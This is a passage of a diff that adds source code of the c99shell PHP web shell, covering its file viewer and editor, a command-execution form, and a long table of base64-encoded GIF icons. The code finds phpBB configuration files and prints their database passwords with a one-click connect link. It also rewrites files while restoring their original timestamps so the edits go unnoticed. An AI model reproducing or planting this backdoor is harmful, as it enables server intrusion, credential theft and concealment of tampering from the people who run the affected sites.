+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "%</a>&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
